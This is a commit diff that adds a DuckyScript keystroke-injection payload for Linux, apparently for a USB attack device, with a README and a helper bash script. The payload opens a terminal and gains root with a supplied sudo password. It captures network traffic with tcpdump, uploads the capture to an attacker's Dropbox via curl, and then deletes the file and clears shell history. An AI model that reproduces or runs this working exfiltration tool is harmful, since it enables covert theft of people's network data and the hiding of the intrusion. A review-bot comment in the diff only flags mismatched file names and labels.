commit
ea645e3110
|
@ -0,0 +1,27 @@
|
||||||
|
# Exfiltrate Network Traffic - Linux ✅
|
||||||
|
|
||||||
|
A script used to exfiltrate the network traffic on a Linux machine.
|
||||||
|
|
||||||
|
**Category**: Exfiltrate
|
||||||
|
|
||||||
|
## Description
|
||||||
|
|
||||||
|
A script used to exfiltrate the network traffic on a Linux machine.
|
||||||
|
|
||||||
|
Opens a shell, get the network card name, get the network traffic using tcpdump, send the result to Dropbox, erase traces.
|
||||||
|
|
||||||
|
## Getting Started
|
||||||
|
|
||||||
|
### Dependencies
|
||||||
|
|
||||||
|
* Permissions
|
||||||
|
* Internet Connection
|
||||||
|
|
||||||
|
### Executing program
|
||||||
|
|
||||||
|
* Plug in your device
|
||||||
|
|
||||||
|
### Settings
|
||||||
|
|
||||||
|
* Set the Dropbox token
|
||||||
|
* Set the sniffing filter
|
|
@ -0,0 +1,107 @@
|
||||||
|
|
||||||
|
REM #############################################
|
||||||
|
REM # |
|
||||||
|
REM # Title : Exfiltrate Network Traffic |
|
||||||
|
REM # Author : Aleff |
|
||||||
|
REM # Version : 1.0 |
|
||||||
|
REM # Category : Exfiltration |
|
||||||
|
REM # Target : Linux |
|
||||||
|
REM # |
|
||||||
|
REM #############################################
|
||||||
|
|
||||||
|
REM Requirements:
|
||||||
|
REM - Permissions
|
||||||
|
REM - Internet Connection
|
||||||
|
|
||||||
|
REM REQUIRED: You need to know the sudo password and replace 'example' with this
|
||||||
|
DEFINE SUDO_PASS example
|
||||||
|
REM REQUIRED: Set what you want to sniff, for example tcp port 80
|
||||||
|
DEFINE SNIFFING example
|
||||||
|
REM Set your Dropbox link or whatever you want to use to exfiltrate the sniff file
|
||||||
|
DEFINE TOKEN example
|
||||||
|
REM Just a Dropbox const
|
||||||
|
DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
|
||||||
|
REM Output file path packets.pcap, remember to use pcap extension
|
||||||
|
DEFINE FILE example.pcap
|
||||||
|
|
||||||
|
|
||||||
|
DELAY 1000
|
||||||
|
CTRL-ALT t
|
||||||
|
DELAY 2000
|
||||||
|
|
||||||
|
|
||||||
|
REM #### PERMISSIONS SECTION ####
|
||||||
|
|
||||||
|
|
||||||
|
STRINGLN sudo su
|
||||||
|
DELAY 1000
|
||||||
|
STRINGLN SUDO_PASS
|
||||||
|
DELAY 1000
|
||||||
|
|
||||||
|
|
||||||
|
REM #### Network Traffic SECTION ####
|
||||||
|
|
||||||
|
|
||||||
|
STRING FILE_PATH="
|
||||||
|
STRING FILE
|
||||||
|
STRING "
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
|
||||||
|
STRING filter_expression="
|
||||||
|
STRING SNIFFING
|
||||||
|
STRING "
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
|
||||||
|
REM Network card name
|
||||||
|
STRINGLN net_card="$(ip route get 8.8.8.8 | awk '{ print $5; exit }')"
|
||||||
|
DELAY 500
|
||||||
|
|
||||||
|
REM Network dump
|
||||||
|
STRINGLN tcpdump -i "$net_card" $filter_expression -w "$FILE_PATH" &
|
||||||
|
DELAY 500
|
||||||
|
|
||||||
|
REM Get PID
|
||||||
|
STRINGLN tcpdump_pid=$!
|
||||||
|
|
||||||
|
REM Set how long you want to sniff
|
||||||
|
DELAY 60000
|
||||||
|
|
||||||
|
REM Kill the process by PID
|
||||||
|
STRINGLN kill $tcpdump_pid
|
||||||
|
|
||||||
|
|
||||||
|
REM #### Exfiltrate SECTION ####
|
||||||
|
REM You can use whatever you want, i use Dropbox
|
||||||
|
|
||||||
|
STRING ACCESS_TOKEN="
|
||||||
|
STRING TOKEN
|
||||||
|
STRING "
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
|
||||||
|
STRINGLN DROPBOX_FOLDER="/Exfiltration"
|
||||||
|
DELAY 500
|
||||||
|
|
||||||
|
STRING curl -X POST
|
||||||
|
STRING DROPBOX_API_CONST
|
||||||
|
STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$FILE_PATH"
|
||||||
|
ENTER
|
||||||
|
|
||||||
|
|
||||||
|
REM #### REMOVE TRACES ####
|
||||||
|
|
||||||
|
|
||||||
|
STRINGLN rm "$FILE_PATH"
|
||||||
|
DELAY 500
|
||||||
|
|
||||||
|
STRINGLN history -c
|
||||||
|
DELAY 500
|
||||||
|
|
||||||
|
REM Exit from Sudo user
|
||||||
|
STRINGLN exit
|
||||||
|
DELAY 500
|
||||||
|
|
||||||
|
REM Close the shell
|
||||||
|
STRINGLN exit
|
|
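Review bot: The comment above `DEFINE FILE` says "Output file path packets.pcap", but the value defined is `example.pcap`, and the standalone bash script added in this same commit writes `packets.pcap`; the comment, the DEFINE value and the bash script should name the same file so the README's "Settings" section can be followed without guessing. The script header's `REM # Category : Exfiltration` also disagrees with the README's `**Category**: Exfiltrate`; pick one spelling and use it in both files.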
@ -0,0 +1,12 @@
|
||||||
|
#!/bin/bash
|
||||||
|
|
||||||
|
filter_expression="tcp port 80"
|
||||||
|
|
||||||
|
net_card="$(ip route get 8.8.8.8 | awk '{ print $5; exit }')"
|
||||||
|
|
||||||
|
tcpdump -i "$net_card" $filter_expression -w packets.pcap &
|
||||||
|
tcpdump_pid=$!
|
||||||
|
|
||||||
|
sleep 60
|
||||||
|
|
||||||
|
kill $tcpdump_pid
|